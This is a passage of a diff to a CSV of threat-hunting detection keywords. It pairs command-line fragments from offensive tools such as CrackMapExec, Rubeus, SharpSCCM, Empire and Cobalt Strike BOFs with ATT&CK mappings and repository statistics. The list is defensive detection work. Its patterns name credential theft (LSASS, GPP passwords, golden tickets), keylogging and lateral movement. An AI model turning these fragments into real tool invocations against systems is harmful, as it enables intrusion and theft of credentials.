tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" "* get class-properties SMS_Admin*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" "* get collection-members -n USERS*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" "* get primary-users -u *","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" "* get site-push-settings*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" -"* get_keystrokes*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* get_netdomaincontroller*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* get_netrdpsession*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* get_keystrokes*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* get_netdomaincontroller*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* get_netrdpsession*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* get_rooot *","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tools","https://github.com/plummm/CVE-2022-27666","1","0","N/A","N/A","3","203","41","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z" -"* get_timedscreenshot*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* get_timedscreenshot*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* GetAppLockerPolicies*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","0","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" "* GetLsassPid*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","0","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "* getprivs.c *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* getprivs.o *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* Get-SpoolStatus.ps1*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "* --get-syscallstub *","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","0","N/A","N/A","7","651","113","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" -"* -GHUser * -GHRepo *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-ExfilDataToGitHub.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -GHUser * -GHRepo *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-ExfilDataToGitHub.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* giop-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* github repos list --org*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" "* github repos list --user *","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" @@ -733,27 +733,27 @@ "* give-genericall * -target-sid *","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "* gkrellm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* gmailC2.exe*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" -"* --gmsa-decrypt-lsa *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"* --gmsa-decrypt-lsa *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "* go build -o padre .*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","0","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z" -"* golden * /badpwdcount*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* golden * /ldap *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* golden * /user:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* golden * /badpwdcount*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* golden * /ldap *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* golden * /user:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "* gopher-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* gophish-*.zip*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" -"* 'GPODDITY$' *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"* --gpo-id * --domain * --command *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"* --gpo-id * --gpo-type * --no-smb-server *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" +"* 'GPODDITY$' *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"* --gpo-id * --domain * --command *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"* --gpo-id * --gpo-type * --no-smb-server *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" "* --GPOName * --FilterEnabled --TargetDnsName *","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","9","855","130","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" -"* gpp_autologin*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* gpp_password*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* gpp_autologin*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec 